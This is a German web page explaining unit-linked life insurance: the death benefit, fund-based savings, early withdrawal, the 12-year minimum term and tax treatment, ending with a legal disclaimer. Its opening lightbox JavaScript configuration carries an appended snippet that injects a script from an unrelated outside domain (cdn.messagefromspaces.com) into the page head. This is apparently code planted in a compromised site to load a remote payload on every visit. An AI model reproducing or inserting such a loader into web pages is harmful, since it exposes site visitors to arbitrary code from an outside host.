, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Fondsgebundene Versicherungen

Sie wollen Ihre Familie für den Todesfall absichern und gleichzeitig Vermögen für die Altersvorsorge bilden?

Fondsgebundene Lebensversicherungen kombinieren die Absicherung im Todesfall mit einem Fondssparplan. Die Bildung des Vermögens ist bei fondsgebundenen Lebensversicherungen an die Wertentwicklung von Aktienfonds, Garantiefonds oder ähnlichen Finanzinstrumenten gebunden. Je nach Versicherung kann zwischen mehreren Fonds gewählt werden.

Im Todesfall wird die vereinbarte Versicherungssumme ausgezahlt. Übersteigt der Wert der Fondsanteile die Versicherungssumme, erhalten Ihre Hinterbliebenen diesen Betrag.

Möchten Sie vorzeitig über Ihr Kapital verfügen, wird der Wert der Fondsanteile zum Tageskurs berechnet und ausgezahlt. So können Sie börsentäglich den Wert Ihrer Fondsanteile ermitteln.

Grundsätzlich werden fondsgebundene Lebensversicherungen für einen langen Anlagezeitraum, mindestens jedoch für 12 Jahre, abgeschlossen. Bei langen Laufzeiten ist mit großer Wahrscheinlichkeit damit zu rechnen, dass der Fonds eine deutlich höhere Rendite erzielt als eine herkömmliche Lebensversicherungen.

Die Ablaufleistung einer fondsgebundenen Lebensversicherung wird durch den Wert der Fondsanteile zum Tageskurs ermittelt und an Sie überwiesen. Einige Jahre vor Laufzeitende kann es ratsam sein, auf Anleihen–Fonds umzusteigen, um Kursverluste zum Ende der Vertragslaufzeit zu vermeiden.

Bei Vertragsabschluss ab dem 1.1.2005 müssen die angesammelten Erträge zur Hälfte versteuert werden (Halbeinkünfteverfahren). Die andere Hälfte bleibt unversteuert, wenn der Vertrag eine Mindestlaufzeit von zwölf Jahren hat und frühestens mit Vollendung des 60. Lebensjahres ausgezahlt wird.

Dieses Homepage richtet sich nicht an Personen mit Wohn– und/ oder Gesellschaftssitz und/ oder Niederlassungen im Ausland, vor allem in den Vereinigten Staaten von Amerika, Kanada, Großbritannien oder Japan. Die angebotenen Information stellen kein öffentliches Angebot für den Erwerb von Wertpapieren oder Finanzinstrumenten dar. Der Anbieter gibt keine Gewährleistungen oder Zusicherungen hinsichtlich der Vollständigkeit oder Richtigkeit dieser Informationen oder Meinungen ab. Eine Investitionsentscheidung bezüglich irgendwelcher Wertpapiere oder sonstiger Finanzinstrumente sollte auf der Grundlage eines Beratungsgespräches sowie Prospekts oder Informationsmemorandums erfolgen und auf keinen Fall auf der Grundlage dieser Homepage.


Email
Print
WP Socializer Aakash Web